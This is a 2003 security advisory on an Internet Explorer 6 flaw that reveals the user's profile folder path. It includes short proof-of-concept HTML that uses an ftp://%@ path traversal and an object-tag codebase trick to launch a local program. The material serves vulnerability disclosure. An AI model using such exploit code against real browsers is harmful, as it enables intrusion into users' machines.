Title:

Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability

Date:

5 June 2003 (Last modified: )

Author:

Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]
penetration technique research site [Advisories]

Vulnerable:

Windows2000 SP3 Internet Explorer 6.0 SP1

Bugtraq ID:

7826

Overview:

A remote attacker is able to gain access to the path of the %USERPROFILE% folder without guessing a target user name by this vulnerability.

ex.) %USERPROFILE% = "C:\Documents and Settings\victim"

Details:

This vulnerability is in the address of a "Cannot find server" page.
The address of a "Cannot find server" page is

"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and Settings\%USERNAME%\Desktop\ftp:\\%@\".

Exploit code:

**************************************************
This exploit reads %TEMP%\exploit.html.
You need to create it.
And click on the "Exploit" link on the ftpexp.html.
**************************************************

[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"  codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>

[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>

Workaround:

None.

Vendor status:

Microsoft was notified on 7 November 2002.
A patch will be released to fix this bug in the future.

Similar vulnerability:

Microsoft Windows Server 2003 "Shell Folders" Directory Traversal Vulnerability

 Copyright(c) 2003 Eiji James Yoshida. All rights reserved